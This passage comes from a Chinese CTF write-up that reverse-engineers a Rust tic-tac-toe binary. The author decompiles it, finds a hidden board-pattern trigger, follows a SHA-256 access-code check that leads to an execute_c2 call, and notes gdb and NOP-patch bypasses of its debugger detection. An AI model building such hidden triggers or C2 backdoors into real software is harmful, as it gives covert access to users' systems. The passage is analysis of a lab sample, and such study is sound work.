    v42 = tictactoe::check_winner(v59, (unsigned int)v62, v63);
241
    if ( (v42 & 1) != 0 )
242
    {
243
      core::fmt::rt::Argument::new_display(&v90, &v62);
244
      v89 = v90;
245
      v15 = &off_3A52A8;
246
      core::fmt::Arguments::new_v1(v88, &off_3A52A8, &v89);
247
      std::io::stdio::_print(v88);
248
      goto LABEL_40;
249
    }
250
    is_full = tictactoe::is_full(v59);
251
    if ( (is_full & 1) != 0 )
252
      break;
253
    if ( v62 == 88 )
254
      v92 = 79;
255
    else
256
      v92 = 88;
257
    v62 = v92;
258
    core::ptr::drop_in_place<alloc::vec::Vec<usize>>((int)v81, v10, v11, v12, v13, v14, v32, v36);
259
    core::ptr::drop_in_place<alloc::string::String>(v79);
260
  }
261
  v15 = &off_3A5298;
262
  core::fmt::Arguments::new_const(v91, &off_3A5298);
263
  std::io::stdio::_print(v91);
264
LABEL_40:
265
  core::ptr::drop_in_place<alloc::vec::Vec<usize>>((int)v81, (int)v15, v16, v17, v18, v19, v32, v36);
266
  core::ptr::drop_in_place<alloc::string::String>(v79);
267
  return core::ptr::drop_in_place<alloc::vec::Vec<(usize,usize,char)>>((int)v63, (int)v15, v20, v21, v22, v23, v33, v37);
268
}

逆天，tictactoe::detect_debugger 检测到程序被调试就会结束，我试了下 gdb 可以通过 set $rip 绕过，还有一个想法是通过 IDA 把这个调用 patch 成 nop，就是不清楚这两种方法会不会影响到后续的程序执行。不过以「过来人」的结论来说，我们做这题根本用不着动态调试就是了。研究怎么 patch 这个程序又浪费了我十几分钟……后来也没成功，直接放弃了，继续分析……

接着程序中有几个 for 循环，我斗胆猜测一下，应该是初始化棋盘的。然后那个庞大的 while 循环里面，看了下，应该是负责显示棋盘，接收用户输入并设置棋盘。注意到它通过 core::str::<impl str>::trim 去除输入两端的垃圾字符，core::str::<impl str>::split_whitespace 想必就是将输入按空格分隔了，然后 core::iter::traits::iterator::Iterator::filter_map 对输入做了一些过滤，最后用 core::iter::traits::iterator::Iterator::collect 将结果整合起来进行后续的操作。

之后，*(_QWORD *)v55 >= 5uLL 和 *v54 >= 5uLL 的几个 if 应该就是检测输入的行列是否超出了棋盘大小。那就可以很自然的推断出外层 if alloc::vec::Vec<T,A>::len(v81) == 2 && *(_QWORD *)<alloc::vec::Vec<T,A> as core::ops::index::Index<I>>::index(v81, 0LL, &off_3A5190) < 5uLL && *(_QWORD *)<alloc::vec::Vec<T,A> as core::ops::index::Index<I>>::index(v81, 1LL, &off_3A51A8) < 5uLL 这一长串就是判断提供的输入是否是合法的两个行列数据，并且它们都在合法的范围内。之后又分别对行列数据范围做了检测，没问题就设置棋盘的对应元素。

之后 alloc::vec::Vec<T,A>::push 应该是把棋盘数据保存到 vector 中，用于后续 tictactoe::check_winner 判断哪一方胜出。任何一方胜出后都会跳转到 LABEL_40 回收内存。

tictactoe::is_full，看名字就知道肯定是检测棋盘被填满还没有分出胜负的情况，后续的 std::io::stdio::_print 来看也可以证实这一点，如果填满了就输出 It's a draw!.

目前还没发现任何有关后门的线索，哪怕是验证函数也没见它调用过。我们深入 tictactoe::check_winner 看看：

1
char __fastcall tictactoe::check_winner(int a1, int a2, __int64 a3, int a4, int a5, int a6)
2
{
3
  __int64 v6; // rax
4
  __int64 v7; // rdx
5
  __int64 v8; // rax
6
  __int64 v9; // rdx
7
  __int64 v10; // rax
8
  __int64 v11; // rdx
9
  int v12; // eax
10
  int v13; // edx
11
  int v14; // ecx
12
  int v15; // r8d
13
  int v16; // r9d
14
  __int64 v17; // rax
15
  __int64 v18; // rdx
16
  char **v19; // rsi
17
  __int64 v20; // rdx
18
  __int64 v21; // rax
19
  unsigned __int64 v22; // rdx
20
  int v23; // edx
21
  int v24; // ecx
22
  int v25; // r8d
23
  int v26; // r9d
24
  __int64 v28; // rdx
25
  int v29; // r8d
26
  int v30; // r9d
27
  int v31; // edx
28
  int v32; // ecx
29
  int v33; // r8d
30
  int v34; // r9d
31
  __int64 v35; // rax
32
  __int64 v36; // rdx
33
  int v37; // [rsp+0h] [rbp-358h]
34
  int v38; // [rsp+0h] [rbp-358h]
35
  struct _Unwind_Exception *v39; // [rsp+0h] [rbp-358h]
36
  int v40; // [rsp+8h] [rbp-350h]
37
  int v41; // [rsp+8h] [rbp-350h]
38
  int v42; // [rsp+8h] [rbp-350h]
39
  int v43; // [rsp+10h] [rbp-348h]
40
  int v44; // [rsp+10h] [rbp-348h]
41
  int v45; // [rsp+10h] [rbp-348h]
42
  int v46; // [rsp+18h] [rbp-340h]
43
  char v47; // [rsp+18h] [rbp-340h]
44
  int v48; // [rsp+18h] [rbp-340h]
45
  char v49; // [rsp+1Eh] [rbp-33Ah]
46
  int v50; // [rsp+20h] [rbp-338h]
47
  int v51; // [rsp+20h] [rbp-338h]
48
  int v52; // [rsp+28h] [rbp-330h]
49
  int v53; // [rsp+28h] [rbp-330h]
50
  int v54; // [rsp+30h] [rbp-328h]
51
  int v55; // [rsp+30h] [rbp-328h]
52
  struct _Unwind_Exception *v56; // [rsp+30h] [rbp-328h]
53
  char v57; // [rsp+36h] [rbp-322h]
54
  char v58; // [rsp+37h] [rbp-321h]
55
  int v59; // [rsp+38h] [rbp-320h]
56
  int v60; // [rsp+38h] [rbp-320h]
57
  int v61; // [rsp+38h] [rbp-320h]
58
  struct _Unwind_Exception *v62; // [rsp+40h] [rbp-318h]
59
  int v63; // [rsp+40h] [rbp-318h]
60
  int v64; // [rsp+48h] [rbp-310h]
61
  int v65; // [rsp+48h] [rbp-310h]
62
  int v66; // [rsp+50h] [rbp-308h]
63
  int v67; // [rsp+58h] [rbp-300h]
64
  int v68; // [rsp+60h] [rbp-2F8h]
65
  int v69; // [rsp+68h] [rbp-2F0h]
66
  int v70; // [rsp+88h] [rbp-2D0h]
67
  int v71; // [rsp+90h] [rbp-2C8h]
68
  int v72; // [rsp+98h] [rbp-2C0h]
69
  int v73; // [rsp+A0h] [rbp-2B8h]
70
  int v74; // [rsp+A8h] [rbp-2B0h]
71
  int v75; // [rsp+B0h] [rbp-2A8h]
72
  int v76; // [rsp+B8h] [rbp-2A0h]
73
  struct _Unwind_Exception *v77; // [rsp+C0h] [rbp-298h]
74
  int v78[2]; // [rsp+C8h] [rbp-290h]
75
  int v80; // [rsp+D8h] [rbp-280h] BYREF
76
  char v81; // [rsp+DFh] [rbp-279h]
77
  int v82[6]; // [rsp+E0h] [rbp-278h] BYREF
78
  _BYTE v83[24]; // [rsp+F8h] [rbp-260h] BYREF
79
  int v84[2]; // [rsp+110h] [rbp-248h] BYREF
80
  int v85[2]; // [rsp+118h] [rbp-240h]
81
  int v86[2]; // [rsp+120h] [rbp-238h]
82
  __int64 v87; // [rsp+128h] [rbp-230h] BYREF
83
  __int64 v88; // [rsp+130h] [rbp-228h] BYREF
84
  int v89; // [rsp+13Ch] [rbp-21Ch] BYREF
85
  _QWORD v90[3]; // [rsp+140h] [rbp-218h] BYREF
86
  _QWORD v91[3]; // [rsp+158h] [rbp-200h] BYREF
87
  _BYTE v92[48]; // [rsp+170h] [rbp-1E8h] BYREF
88
  _OWORD v93[3]; // [rsp+1A0h] [rbp-1B8h] BYREF
89
  __int128 v94; // [rsp+1D0h] [rbp-188h] BYREF
90
  __int128 v95; // [rsp+1E0h] [rbp-178h] BYREF
91
  __int128 v96; // [rsp+1F0h] [rbp-168h] BYREF
92
  int v97[2]; // [rsp+200h] [rbp-158h] BYREF
93
  int v98[2]; // [rsp+208h] [rbp-150h]
94
  int v99[2]; // [rsp+210h] [rbp-148h]
95
  int v100[2]; // [rsp+218h] [rbp-140h]
96
  int v101[2]; // [rsp+220h] [rbp-138h] BYREF
97
  int v102[4]; // [rsp+228h] [rbp-130h]
98
  int v103[2]; // [rsp+238h] [rbp-120h]
99
  _BYTE v104[48]; // [rsp+240h] [rbp-118h] BYREF
100
  _BYTE v105[48]; // [rsp+270h] [rbp-E8h] BYREF
101
  _QWORD v106[3]; // [rsp+2A0h] [rbp-B8h] BYREF
102
  unsigned __int64 v107; // [rsp+2B8h] [rbp-A0h]
103
  unsigned __int64 v108; // [rsp+2C0h] [rbp-98h] BYREF
104
  int v109[2]; // [rsp+2C8h] [rbp-90h] BYREF
105
  __int64 v110; // [rsp+2D0h] [rbp-88h]
106
  _QWORD v111[2]; // [rsp+2D8h] [rbp-80h] BYREF
107
  _QWORD v112[3]; // [rsp+2E8h] [rbp-70h] BYREF
108
  _QWORD v113[2]; // [rsp+300h] [rbp-58h] BYREF
109
  _QWORD v114[4]; // [rsp+310h] [rbp-48h] BYREF
110
  __int128 v115; // [rsp+330h] [rbp-28h] BYREF
111
  __int64 v116; // [rsp+340h] [rbp-18h]
112

113
  v80 = a2;
114
  tictactoe::obfuscate_pattern((int)v82, a2, a3, a4, a5, a6, v37, v40, v43, v46, v50, v52, v54, v59, v62, v64);
115
  alloc::string::String::new(v83);
116
  v6 = <alloc::vec::Vec<T,A> as core::ops::deref::Deref>::deref(a3);
117
  v76 = v7;
118
  v77 = (struct _Unwind_Exception *)v6;
119
  v8 = core::slice::<impl [T]>::iter(v6, v7);
120
  v72 = v9;
121
  v73 = v8;
122
  v10 = <I as core::iter::traits::collect::IntoIterator>::into_iter(v8, v9);
123
  v70 = v11;
124
  v71 = v10;
125
  *(_QWORD *)v84 = v10;
126
  *(_QWORD *)v85 = v11;
127
  while ( 1 )
128
  {
129
    *(_QWORD *)v86 = <core::slice::iter::Iter<T> as core::iter::traits::iterator::Iterator>::next(v84);
130
    if ( !*(_QWORD *)v86 )
131
      break;
132
    v87 = **(_QWORD **)v86;
133
    v88 = *(_QWORD *)(*(_QWORD *)v86 + 8LL);
134
    v89 = *(_DWORD *)(*(_QWORD *)v86 + 16LL);
135
    core::fmt::rt::Argument::new_display(&v94, &v89);
136
    core::fmt::rt::Argument::new_display(&v95, &v87);
137
    core::fmt::rt::Argument::new_display(&v96, &v88);
138
    v93[0] = v94;
139
    v93[1] = v95;
140
    v93[2] = v96;
141
    core::fmt::Arguments::new_v1(v92, &unk_3A5110, v93);
142
    alloc::fmt::format((unsigned int)v91, (unsigned int)v92);
143
    v90[0] = v91[0];
144
    v90[1] = v91[1];
145
    v90[2] = v91[2];
146
    v35 = <alloc::string::String as core::ops::deref::Deref>::deref(v90);
147
    v41 = v36;
148
    v44 = v35;
149
    alloc::string::String::push_str(v83, v35, v36);
150
    core::ptr::drop_in_place<alloc::string::String>(v90);
151
  }
152
  v12 = <alloc::string::String as core::ops::deref::Deref>::deref(v82);
153
  regex::regex::string::Regex::new(
154
    (int)v101,
155
    v12,
156
    v13,
157
    v14,
158
    v15,
159
    v16,
160
    v38,
161
    v41,
162
    v44,
163
    v47,
164
    v51,
165
    v53,
166
    v55,
167
    v60,
168
    v63,
169
    v65,
170
    v66,
171
    v67,
172
    v68,
173
    v69,
174
    v13,
175
    v12,
176
    0,
177
    v70,
178
    v71,
179
    v72,
180
    v73,
181
    v74,
182
    v75,
183
    v76,
184
    v77,
185
    a1);
186
  if ( !*(_QWORD *)v101 )
187
  {
188
    v116 = *(_QWORD *)v103;
189
    v115 = *(_OWORD *)v102;
190
    core::result::unwrap_failed(aCalledResultUn, 43LL, &v115, &off_3A4EE0, &off_3A50D0);
191
  }
192
  *(_QWORD *)v97 = *(_QWORD *)v101;
193
  *(_QWORD *)v98 = *(_QWORD *)v102;
194
  *(_QWORD *)v99 = *(_QWORD *)&v102[2];
195
  *(_QWORD *)v100 = *(_QWORD *)v103;
196
  v17 = <alloc::string::String as core::ops::deref::Deref>::deref(v83);
197
  if ( (regex::regex::string::Regex::is_match(v97, v17, v18) & 1) != 0 )
198
  {
199
    v19 = &off_3A5100;
200
    core::fmt::Arguments::new_const(v104, &off_3A5100);
201
    std::io::stdio::_print(v104);
202
    if ( (tictactoe::validate_access_code((int)v104, (int)&off_3A5100, v31, v32, v33, v34) & 1) != 0 )
203
    {
204
      tictactoe::ask_for_credentials();
205
      v81 = 1;
206
    }
207
    else
208
    {
209
      v19 = &off_3A4FE8;
210
      core::fmt::Arguments::new_const(v105, &off_3A4FE8);
211
      std::io::stdio::_print(v105);
212
      v81 = 0;
213
    }
214
  }
215
  else
216
  {
217
    v106[0] = <I as core::iter::traits::collect::IntoIterator>::into_iter(0LL, 5LL);
218
    v106[1] = v20;
219
    while ( 1 )
220
    {
221
      v21 = core::iter::range::<impl core::iter::traits::iterator::Iterator for core::ops::range::Range<A>>::next(v106);
222
      v61 = v22;
223
      v106[2] = v21;
224
      v107 = v22;
225
      if ( !v21 )
226
        break;
227
      v108 = v107;
228
      if ( v107 >= 5 )
229
        core::panicking::panic_bounds_check(v108, 5LL, (__int64)&off_3A50E8);
230
      *(_QWORD *)v109 = core::slice::<impl [T]>::iter(*(_QWORD *)v78 + 20 * v108, 5LL);
231
      v110 = v28;
232
      v19 = (char **)&v80;
233
      if ( (<core::slice::iter::Iter<T> as core::iter::traits::iterator::Iterator>::all(
234
              (int)v109,
235
              (int)&v80,
236
              v28,
237
              v109[0],
238
              v29,
239
              v30,
240
              (int)v39,
241
              v42,
242
              v45,
243
              v48,
244
              v28,
245
              v109[0],
246
              v56,
247
              v61) & 1) != 0 )
248
      {
249
        v81 = 1;
250
        goto LABEL_21;
251
      }
252
      v111[0] = 0LL;
253
      v111[1] = 5LL;
254
      v112[0] = *(_QWORD *)v78;
255
      v112[1] = &v108;
256
      v112[2] = &v80;
257
      v19 = (char **)v112;
258
      v49 = core::iter::traits::iterator::Iterator::all(v111, v112);
259
      if ( (v49 & 1) != 0 )
260
      {
261
        v81 = 1;
262
        goto LABEL_21;
263
      }
264
    }
265
    LODWORD(v19) = v78[0];
266
    v113[0] = 0LL;
267
    v113[1] = 5LL;
268
    v58 = core::iter::traits::iterator::Iterator::all(v113, *(_QWORD *)v78, &v80);
269
    if ( (v58 & 1) != 0 )
270
    {
271
      v81 = 1;
272
      goto LABEL_21;
273
    }
274
    LODWORD(v19) = v78[0];
275
    v114[0] = 0LL;
276
    v114[1] = 5LL;
277
    v57 = core::iter::traits::iterator::Iterator::all(v114, *(_QWORD *)v78, &v80);
278
    if ( (v57 & 1) == 0 )
279
    {
280
      v81 = 0;
281
      core::ptr::drop_in_place<regex::regex::string::Regex>((int)v97, v78[0], v23, v24, v25, v26, v39, v42);
282
      core::ptr::drop_in_place<alloc::string::String>(v83);
283
      core::ptr::drop_in_place<alloc::string::String>(v82);
284
      return v81 & 1;
285
    }
286
    v81 = 1;
287
  }
288
LABEL_21:
289
  core::ptr::drop_in_place<regex::regex::string::Regex>((int)v97, (int)v19, v23, v24, v25, v26, v39, v42);
290
  core::ptr::drop_in_place<alloc::string::String>(v83);
291
  core::ptr::drop_in_place<alloc::string::String>(v82);
292
  return v81 & 1;
293
}

发现一个叫做 tictactoe::obfuscate_pattern 的函数。

我对 obfuscate 这样的字眼比较敏感，并且函数名中有 pattern，直觉就告诉我这个函数应该是在检测某种棋盘布局，带着这样的直觉进入函数内部一探究竟，果不其然：

1
__int64 __fastcall tictactoe::obfuscate_pattern(__int64 a1)
2
{
3
  __int64 v1; // rdx
4
  __int64 v2; // rcx
5
  __int64 v3; // r8
6
  __int64 v4; // r9
7
  __int64 v5; // rax
8
  __int64 v6; // rdx
9
  int v7; // esi
10
  int v8; // edx
11
  int v9; // ecx
12
  int v10; // r8d
13
  int v11; // r9d
14
  int v13; // [rsp+8h] [rbp-50h]
15
  __int64 v14; // [rsp+28h] [rbp-30h]
16
  struct _Unwind_Exception v15; // [rsp+30h] [rbp-28h] BYREF
17

18
  v14 = alloc::alloc::exchange_malloc(144LL, 8LL);
19
  if ( (v14 & 7) != 0 )
20
    core::panicking::panic_misaligned_pointer_dereference(8LL, v14, &off_3A50B8);
21
  if ( !v14 )
22
    ((void (__fastcall __noreturn *)(char **, __int64, __int64, __int64, __int64, __int64))core::panicking::panic_null_pointer_dereference)(
23
      &off_3A50B8,
24
      8LL,
25
      v1,
26
      v2,
27
      v3,
28
      v4);
29
  *(_QWORD *)v14 = aX00;
30
  *(_QWORD *)(v14 + 8) = 4LL;
31
  *(_QWORD *)(v14 + 16) = "O:04>";
32
  *(_QWORD *)(v14 + 24) = 4LL;
33
  *(_QWORD *)(v14 + 32) = "X:11mode{";
34
  *(_QWORD *)(v14 + 40) = 4LL;
35
  *(_QWORD *)(v14 + 48) = "O:13~";
36
  *(_QWORD *)(v14 + 56) = 4LL;
37
  *(_QWORD *)(v14 + 64) = aX22;
38
  *(_QWORD *)(v14 + 72) = 4LL;
39
  *(_QWORD *)(v14 + 80) = aO31;
40
  *(_QWORD *)(v14 + 88) = 4LL;
41
  *(_QWORD *)(v14 + 96) = aX33;
42
  *(_QWORD *)(v14 + 104) = 4LL;
43
  *(_QWORD *)(v14 + 112) = "O:40X:44utf8info\\";
44
  *(_QWORD *)(v14 + 120) = 4LL;
45
  *(_QWORD *)(v14 + 128) = "X:44utf8info\\";
46
  *(_QWORD *)(v14 + 136) = 4LL;
47
  alloc::slice::<impl [T]>::into_vec(&v15, v14, 9LL);
48
  v5 = <alloc::vec::Vec<T,A> as core::ops::deref::Deref>::deref(&v15);
49
  v13 = v6;
50
  v7 = v5;
51
  alloc::slice::<impl [T]>::join(a1, v5, v6, 1LL, 0LL);
52
  core::ptr::drop_in_place<alloc::vec::Vec<&str>>((int)&v15, v7, v8, v9, v10, v11, &v15, v13);
53
  return a1;
54
}

1
[...]
2
.rodata:0000000000080368 aX00            db 'X:00'               ; DATA XREF: tictactoe::obfuscate_pattern+61↓o
3
.rodata:00000000000823BC aO04            db 'O:04'               ; DATA XREF: tictactoe::obfuscate_pattern+73↓o
4
.rodata:0000000000082884 aX11            db 'X:11'               ; DATA XREF: tictactoe::obfuscate_pattern+86↓o
5
.rodata:0000000000081C24 aO13            db 'O:13'               ; DATA XREF: tictactoe::obfuscate_pattern+99↓o
6
.rodata:000000000008190C aX22            db 'X:22'               ; DATA XREF: tictactoe::obfuscate_pattern+AC↓o
7
.rodata:0000000000080364 aO31            db 'O:31'               ; DATA XREF: tictactoe::obfuscate_pattern+BF↓o
8
.rodata:0000000000080654 aX33            db 'X:33'               ; DATA XREF: tictactoe::obfuscate_pattern+D2↓o
9
.rodata:000000000007FB80 aO40            db 'O:40'               ; DATA XREF: tictactoe::obfuscate_pattern+E5↓o
10
.rodata:000000000007FB84 aX44            db 'X:44'               ; DATA XREF: tictactoe::obfuscate_pattern+F8↓o
11
[...]

棋盘上每个空都是一个 QWORD，而 aX00，aO31 这样的名字，很容易让人联想到 X 和 O 棋子，说不定这后面的数字就代表这个棋子在棋盘中的坐标。

猜想是否正确，我们照着输一遍就是了：

1
Player O's turn. Enter row and column (0-4): 4 0
2
X - - - O
3
- X - O -
4
- - X - -
5
- O - X -
6
O - - - -
7

8
Player X's turn. Enter row and column (0-4): 4 4
9

10
--- Pattern Recognized! ---
11

12
--- Hidden Interface Unlocked ---
13
Enter Username:

Bingo ! 解锁隐藏界面。

现在我们成功进入了 regex::regex::string::Regex::is_match(v97, v17, v18) & 1) != 0 内部，调用了 tictactoe::ask_for_credentials。这个函数先获取输入作为 username，看了一下它只是随便接收了一个输入，并没有对其做任何判断，说明 username 可以是任意的。然后问我们要 Access Code，并通过 tictactoe::sha256_hash 将我们输入的 Access Code 转换为 sha256.

1
__int64 tictactoe::ask_for_credentials()
2
{
3
  int v0; // eax
4
  int v1; // edx
5
  int v2; // r9d
6
  __int64 v3; // rax
7
  __int64 v4; // rdx
8
  __int64 v5; // rdx
9
  int v6; // eax
10
  struct _Unwind_Exception *v7; // rdx
11
  int v8; // r9d
12
  __int64 v9; // rax
13
  __int64 v10; // rdx
14
  int v11; // eax
15
  int v12; // edx
16
  int v13; // edx
17
  int v14; // ecx
18
  int v15; // r8d
19
  int v16; // r9d
20
  int v18; // [rsp+0h] [rbp-2A8h]
21
  int v19; // [rsp+0h] [rbp-2A8h]
22
  int v20; // [rsp+8h] [rbp-2A0h]
23
  int v21; // [rsp+8h] [rbp-2A0h]
24
  int v22; // [rsp+10h] [rbp-298h]
25
  int v23; // [rsp+10h] [rbp-298h]
26
  int v24; // [rsp+18h] [rbp-290h]
27
  int v25; // [rsp+18h] [rbp-290h]
28
  int v26; // [rsp+20h] [rbp-288h]
29
  int v27; // [rsp+20h] [rbp-288h]
30
  char v28; // [rsp+28h] [rbp-280h]
31
  char v29; // [rsp+28h] [rbp-280h]
32
  struct _Unwind_Exception *v30; // [rsp+30h] [rbp-278h]
33
  int v31; // [rsp+38h] [rbp-270h]
34
  int v32[12]; // [rsp+C8h] [rbp-1E0h] BYREF
35
  _BYTE v33[24]; // [rsp+F8h] [rbp-1B0h] BYREF
36
  _BYTE v34[24]; // [rsp+110h] [rbp-198h] BYREF
37
  _BYTE v35[48]; // [rsp+128h] [rbp-180h] BYREF
38
  __int64 v36; // [rsp+158h] [rbp-150h] BYREF
39
  __int64 v37; // [rsp+160h] [rbp-148h] BYREF
40
  _QWORD v38[2]; // [rsp+168h] [rbp-140h] BYREF
41
  _BYTE v39[48]; // [rsp+178h] [rbp-130h] BYREF
42
  __int64 v40; // [rsp+1A8h] [rbp-100h] BYREF
43
  __int64 v41; // [rsp+1B0h] [rbp-F8h] BYREF
44
  int v42[6]; // [rsp+1B8h] [rbp-F0h] BYREF
45
  _BYTE v43[48]; // [rsp+1D0h] [rbp-D8h] BYREF
46
  __int128 v44; // [rsp+200h] [rbp-A8h] BYREF
47
  __int128 v45; // [rsp+218h] [rbp-90h] BYREF
48
  _BYTE v46[64]; // [rsp+228h] [rbp-80h] BYREF
49
  __int64 v47; // [rsp+268h] [rbp-40h]
50
  __int64 v48[3]; // [rsp+270h] [rbp-38h] BYREF
51
  __int64 v49; // [rsp+288h] [rbp-20h]
52
  __int64 v50[3]; // [rsp+290h] [rbp-18h] BYREF
53

54
  core::fmt::Arguments::new_const(v32, &off_3A4FF8);
55
  std::io::stdio::_print(v32);
56
  alloc::string::String::new(v33);
57
  alloc::string::String::new(v34);
58
  core::fmt::Arguments::new_const(v35, &off_3A5008);
59
  std::io::stdio::_print(v35);
60
  v36 = std::io::stdio::stdout();
61
  v49 = <std::io::stdio::Stdout as std::io::Write>::flush(&v36);
62
  if ( v49 )
63
  {
64
    v50[0] = v49;
65
    core::result::unwrap_failed(aCalledResultUn, 43LL, v50, &off_3A4F00, &off_3A5018);
66
  }
67
  v37 = std::io::stdio::stdin();
68
  v0 = std::io::stdio::Stdin::read_line(&v37, v33);
69
  core::result::Result<T,E>::expect(
70
    v0,
71
    v1,
72
    (int)aFailedToReadUs,
73
    23,
74
    (int)&off_3A5030,
75
    v2,
76
    v18,
77
    v20,
78
    v22,
79
    v24,
80
    v26,
81
    v28,
82
    v30,
83
    v31);
84
  v3 = <alloc::string::String as core::ops::deref::Deref>::deref(v33);
85
  v38[0] = core::str::<impl str>::trim(v3, v4);
86
  v38[1] = v5;
87
  core::fmt::Arguments::new_const(v39, &off_3A5048);
88
  std::io::stdio::_print(v39);
89
  v40 = std::io::stdio::stdout();
90
  v47 = <std::io::stdio::Stdout as std::io::Write>::flush(&v40);
91
  if ( v47 )
92
  {
93
    v48[0] = v47;
94
    core::result::unwrap_failed(aCalledResultUn, 43LL, v48, &off_3A4F00, &off_3A5058);
95
  }
96
  v41 = std::io::stdio::stdin();
97
  v6 = std::io::stdio::Stdin::read_line(&v41, v34);
98
  core::result::Result<T,E>::expect(
99
    v6,
100
    (int)v7,
101
    (int)aFailedToReadAc,
102
    26,
103
    (int)&off_3A5070,
104
    v8,
105
    v19,
106
    v21,
107
    v23,
108
    v25,
109
    v27,
110
    v29,
111
    v7,
112
    v6);
113
  v9 = <alloc::string::String as core::ops::deref::Deref>::deref(v34);
114
  v11 = core::str::<impl str>::trim(v9, v10);
115
  tictactoe::sha256_hash((int)v42, v11, v12);
116
  if ( (<alloc::string::String as core::cmp::PartialEq<&str>>::eq(v42, &off_3A4F88) & 1) == 0 )
117
  {
118
    core::ptr::drop_in_place<alloc::string::String>(v42);
119
    core::fmt::Arguments::new_const(v46, &off_3A5088);
120
    std::io::stdio::_print(v46);
121
    std::process::exit(1);
122
  }
123
  core::ptr::drop_in_place<alloc::string::String>(v42);
124
  core::fmt::rt::Argument::new_display(&v45, v38);
125
  v44 = v45;
126
  core::fmt::Arguments::new_v1(v43, &off_3A5098, &v44);
127
  std::io::stdio::_print(v43);
128
  tictactoe::execute_c2((int)v43, (int)&off_3A5098, v13, v14, v15, v16);
129
  core::ptr::drop_in_place<alloc::string::String>(v34);
130
  return core::ptr::drop_in_place<alloc::string::String>(v33);
131
}

1
__int64 __fastcall tictactoe::sha256_hash(int a1, int a2, int a3)
2
{
3
  int v3; // ecx
4
  int v4; // r8d
5
  int v5; // r9d
6
  __int64 result; // rax
7
  _QWORD *v8; // [rsp+10h] [rbp-178h]
8
  int v9[2]; // [rsp+18h] [rbp-170h]
9
  struct _Unwind_Exception *src; // [rsp+20h] [rbp-168h] BYREF
10
  int v11; // [rsp+28h] [rbp-160h]
11
  _BYTE v12[32]; // [rsp+90h] [rbp-F8h] BYREF
12
  _BYTE dest[112]; // [rsp+B0h] [rbp-D8h] BYREF
13
  _QWORD v14[3]; // [rsp+120h] [rbp-68h] BYREF
14
  _BYTE v15[48]; // [rsp+138h] [rbp-50h] BYREF
15
  _QWORD v16[2]; // [rsp+168h] [rbp-20h] BYREF
16
  _QWORD v17[2]; // [rsp+178h] [rbp-10h] BYREF
17

18
  <D as digest::digest::Digest>::new((unsigned int)&src);
19
  <D as digest::digest::Digest>::update((int)&src, a2, a3, v3, v4, v5, a3, a2, a1, a1, src, v11);
20
  memcpy(dest, &src, sizeof(dest));
21
  <D as digest::digest::Digest>::finalize((unsigned int)v12);
22
  core::fmt::rt::Argument::new_lower_hex(v17, v12);
23
  v16[0] = v17[0];
24
  v16[1] = v17[1];
25
  core::fmt::Arguments::new_v1(v15, &unk_7B290, v16);
26
  alloc::fmt::format((unsigned int)v14, (unsigned int)v15);
27
  result = *(_QWORD *)v9;
28
  *v8 = v14[0];
29
  v8[1] = v14[1];
30
  v8[2] = v14[2];
31
  return result;
32
}

之后 (<alloc::string::String as core::cmp::PartialEq<&str>>::eq(v42, &off_3A4F88) & 1) == 0 将转换结果与 271c6d20f3ba3894199fc3f58b1087130ec340bf85e290b335f8dd4a09ce802f 这串 hash 作对比，如果相同就调用 tictactoe::execute_c2.

好了，现在只要搞清楚什么样的明文加密成 sha256 后等于上述的值就好了。由于 hash 加密不可逆，有撞库的方法，不过我试了下没啥用，再次成功浪费了几分钟……

那难道我们破解不了明文了吗？别忘了我们还有 tictactoe::decrypt_key，看名字就知道和解密相关，现在全村的希望都压在这个函数上了……

1
_QWORD *__fastcall tictactoe::decrypt_key(_QWORD *a1)
2
{
3
  __int64 v1; // rax
4
  __int64 v2; // rdx
5
  __int64 v3; // rax
6
  __int64 v4; // rdx
7
  __int64 v5; // rax
8
  __int64 v6; // rdx
9
  int v8[6]; // [rsp+60h] [rbp-108h] BYREF
10
  int v9[6]; // [rsp+78h] [rbp-F0h] BYREF
11
  int v10[6]; // [rsp+90h] [rbp-D8h] BYREF
12
  _QWORD v11[3]; // [rsp+A8h] [rbp-C0h] BYREF
13
  _BYTE v12[48]; // [rsp+C0h] [rbp-A8h] BYREF
14
  _OWORD v13[3]; // [rsp+F0h] [rbp-78h] BYREF
15
  __int128 v14; // [rsp+128h] [rbp-40h] BYREF
16
  __int128 v15; // [rsp+138h] [rbp-30h] BYREF
17
  __int128 v16; // [rsp+148h] [rbp-20h] BYREF
18

19
  v1 = core::slice::<impl [T]>::iter(tictactoe::ENC_PART1);
20
  core::iter::traits::iterator::Iterator::map(v1, v2);
21
  core::iter::traits::iterator::Iterator::collect((int)v8);
22
  v3 = ((__int64 (__fastcall *)(void *, __int64))core::slice::<impl [T]>::iter)(&tictactoe::ENC_PART2, 7LL);
23
  core::iter::traits::iterator::Iterator::map(v3, v4);
24
  core::iter::traits::iterator::Iterator::collect((int)v9);
25
  v5 = core::slice::<impl [T]>::iter(tictactoe::ENC_PART3);
26
  core::iter::traits::iterator::Iterator::map(v5, v6);
27
  core::iter::traits::iterator::Iterator::collect((int)v10);
28
  core::fmt::rt::Argument::new_display(&v14, v8);
29
  core::fmt::rt::Argument::new_display(&v15, v9);
30
  core::fmt::rt::Argument::new_display(&v16, v10);
31
  v13[0] = v14;
32
  v13[1] = v15;
33
  v13[2] = v16;
34
  core::fmt::Arguments::new_v1(v12, &unk_7AE08, v13);
35
  alloc::fmt::format((unsigned int)v11, (unsigned int)v12);
36
  *a1 = v11[0];
37
  a1[1] = v11[1];
38
  a1[2] = v11[2];
39
  core::ptr::drop_in_place<alloc::string::String>(v10);
40
  core::ptr::drop_in_place<alloc::string::String>(v9);
41
  core::ptr::drop_in_place<alloc::string::String>(v8);
42
  return a1;
43
}

分析这个函数，看到它分 ENC_PART1、ENC_PART2、ENC_PART3 三部分处理。

1
.rodata:000000000007ADC5 ; tictactoe::ENC_PART1
2
.rodata:000000000007ADC5 _ZN9tictactoe9ENC_PART117hc9692e3072677d14E db 1Eh
3
.rodata:000000000007ADC5                                         ; DATA XREF: tictactoe::decrypt_key+11↓o
4
.rodata:000000000007ADC6                 db  69h ; i
5
.rodata:000000000007ADC7                 db  3Ch ; <
6
.rodata:000000000007ADC8                 db  6Bh ; k
7
.rodata:000000000007ADC9                 db  34h ; 4
8
.rodata:000000000007ADCA                 db  69h ; i
9
.rodata:000000000007ADCB                 db  2Eh ; .
10
.rodata:000000000007ADCC ; tictactoe::ENC_PART2
11
.rodata:000000000007ADCC _ZN9tictactoe9ENC_PART217h32e32663a27b062dE db  36h ; 6
12
.rodata:000000000007ADCC                                         ; DATA XREF: tictactoe::decrypt_key+52↓o
13
.rodata:000000000007ADCD                 db  23h ; #
14
